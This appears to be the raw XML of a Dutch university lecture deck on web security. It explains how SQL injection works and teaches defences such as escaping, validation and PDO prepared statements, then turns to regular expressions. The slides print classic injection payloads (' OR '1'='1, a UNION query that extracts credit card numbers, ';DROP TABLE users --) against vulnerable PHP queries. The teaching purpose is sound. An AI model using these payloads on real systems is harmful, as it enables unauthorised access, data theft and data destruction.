          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>De semantiek van de query wordt gewijzigd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Verkrijgen van user of admin toegang, zonder login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tonen, aanpassen en verwijderen van gegevens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Zowel records, tabellen als databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Het probleem is een gebrek aan input validation!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Quotes in de invoer die in SQL semantiek hebben</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Verkeerd input type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6996" y="1718805"/>
            <a:ext cx="7632848" cy="2862323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$sql = "SELECT * FROM users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        WHERE username=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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>" . $_POST['username'] . "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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        AND password=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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>" . $_POST['password'] . "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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>";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$_POST['username'] = "whatever";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$_POST['password'] = "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' OR '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>";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$sql = "SELECT * FROM users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        WHERE username = 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>whatever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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        AND password = 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' OR '1'='1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36772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rcRect l="119" r="119"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1124744"/>
            <a:ext cx="9902825" cy="588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 afraid. Be very afraid.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5" y="1295400"/>
            <a:ext cx="9407519" cy="5257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/>
              <a:t>Geen enkel systeem is absoluut veilig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Wat mis kan gaan, wordt uiteindelijk misbruikt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bedoeld of onbedoeld...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>De menselijke factor is het minst stabiel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>De gebruiker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>De developer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Iemand die naar binnen wil, komt binnen (maar)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Security is een kat-en-muis spel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Security is een vakgebied op zich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980" y="1196752"/>
            <a:ext cx="7704856" cy="5593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409" y="-144518"/>
            <a:ext cx="10063981" cy="7589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875912"/>
            <a:ext cx="9902825" cy="5433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00" y="6220544"/>
            <a:ext cx="8331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SQL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280642" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>De query wijzigen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Met quotes uit context springen en aanvullen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Eventueel een deel weglaten met commentaar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Het resultaat van de query aanvullen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>oude query UNION ALL nieuwe query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>De query termineren en andere query uitvoeren</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Met quotes uit context springen en termineren (;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Aanvullen met eigen statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Eventueel een deel weglaten met commentaar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Achterhalen wat kan vergt vaak experimenteren</a:t>
            </a:r>
          </a:p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7116" y="1412776"/>
            <a:ext cx="5544616" cy="1477328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$_POST['password'] = "' OR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1=1 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>";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$sql = "SELECT * FROM users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        WHERE username = 'whatever' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        AND password = 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>' OR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1=1 -– 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>";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5571" y="1412776"/>
            <a:ext cx="8136905" cy="2585323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$sql = "SELECT name, address FROM users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        WHERE id &gt; " . $_POST['id'];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$_POST['id'] = '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1 UNION ALL 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                SELECT cardno, expiry FROM credittable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>';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$sql = "SELECT name, address FROM users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        WHERE id &gt;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1 UNION ALL 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        SELECT cardno, expiry FROM credittable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>";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0428" y="1832124"/>
            <a:ext cx="6984776" cy="1754327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$_POST['username'] = "whatever";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$_POST['password'] = "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';DROP TABLE users -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>";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$sql = "SELECT * FROM users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        WHERE username = 'whatever' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        AND password = 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';DROP TABLE users –- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>";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" y="-130727"/>
            <a:ext cx="10060037" cy="758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SQL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407519" cy="5257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/>
              <a:t>Soms maar één query per statement toegestaan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Foutmeldingen niet te informatief maken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"Your query contains an error at the * mark: ..."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Input validation!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Escaping: pg_escape_literal(), addslashes(), etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Positieve validatie, type checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>PDO prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Escaping is platform-specifiek; PDO gebruikt context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9124" y="1556792"/>
            <a:ext cx="5760640" cy="2031325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$sql = "SELECT * FROM product </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        WHERE id = " . $_POST['id'];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$_POST['id'] = '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1;DROP TABLE users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>';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$sql = "SELECT * FROM product </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        WHERE id = 1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;DROP TABLE users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>";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9656" y="1441807"/>
            <a:ext cx="8712968" cy="3139321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&lt;?php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  $sth = $dbh-&gt;prepare('SELECT name, colour, calories</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>                        FROM fruit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>                        WHERE calories &lt; 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  <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> AND colour = 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  <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>');</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  $sth-&gt;bindParam(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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, $calories, PDO::PARAM_INT);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  $sth-&gt;bindParam(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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, $colour, PDO::PARAM_STR, 12);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  $calories = 150;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  $colour = 'red';</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  $sth-&gt;execute();</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  [...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33835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SQL injection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338064"/>
            <a:ext cx="8458200" cy="260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979" y="4005064"/>
            <a:ext cx="7776865" cy="2799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96" y="1153338"/>
            <a:ext cx="7611640" cy="57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055"/>
            <a:ext cx="9919964" cy="7424473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35842" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7"/>
            <a:ext cx="9902825" cy="765175"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="nl-NL">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Security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296400" y="6343654"/>
            <a:ext cx="606425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90" indent="-28568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53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54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956" indent="-22855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058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157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262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362" indent="-22855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fld id="{756AECCE-3931-9A49-BFF7-85E53012F1F2}" type="slidenum">
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="5E574E"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="5E574E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35844" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6119822"/>
            <a:ext cx="9902825" cy="765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b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="4500">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Webtechnologie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35845" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="55566" y="6192839"/>
            <a:ext cx="2287587" cy="69215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l-NL">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Lennart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l-NL">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Herlaar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35846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5946779"/>
            <a:ext cx="2881312" cy="11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7140" y="2996952"/>
            <a:ext cx="9902825" cy="765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  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="457101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6pPr>
            <a:lvl7pPr marL="914204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7pPr>
            <a:lvl8pPr marL="1371303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8pPr>
            <a:lvl9pPr marL="182840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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="482600">
                    <a:srgbClr val="CC0000">
                      <a:alpha val="75000"/>
                    </a:srgbClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Input validation, RegExp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4058822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Input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208634" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Zowel XSS als SQLIA komen neer op niet, onjuist of onvoldoende valideren van input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Escaping (sanitizing), filtering, type checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Afhankelijk van context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Voor escaping bestaan de nodige PHP functies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Voor filtering en type checking (positieve validatie) kun je zelf functies schrijven</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Strings uit elkaar pulken, moeizaam, foutgevoelig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Betere insteek: regular expressions, of RegExps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Beschikbaar in PHP, JavaScript en HTML5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380437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504" y="1243360"/>
            <a:ext cx="1325813" cy="1371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5" y="1295400"/>
            <a:ext cx="9407519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RegExps van PHP zijn afkomstig uit Perl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Practical Extraction and Reporting Language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>High-level, general-purpose, interpreted, dynamic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bedoeld voor verwerken van tekstuele data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Geschreven als combinatie van Unix commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Veel ingezet voor systeembeheer en networking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Modulair; eleganter dan PHP; wel vergelijkbaar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"The Swiss Army chainsaw"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"The duct tape that holds the Internet together"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Als je Linux gebruikt, kijk dan ook eens naar Perl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875" y="1249232"/>
            <a:ext cx="6396889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7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Obfuscated Perl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132" y="1916832"/>
            <a:ext cx="5252860" cy="3893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64" y="1340768"/>
            <a:ext cx="7992888" cy="5286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706" y="2060848"/>
            <a:ext cx="5186994" cy="3960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076" y="1518692"/>
            <a:ext cx="5946248" cy="4927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776" y="1484784"/>
            <a:ext cx="6007080" cy="4957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9776" y="1518692"/>
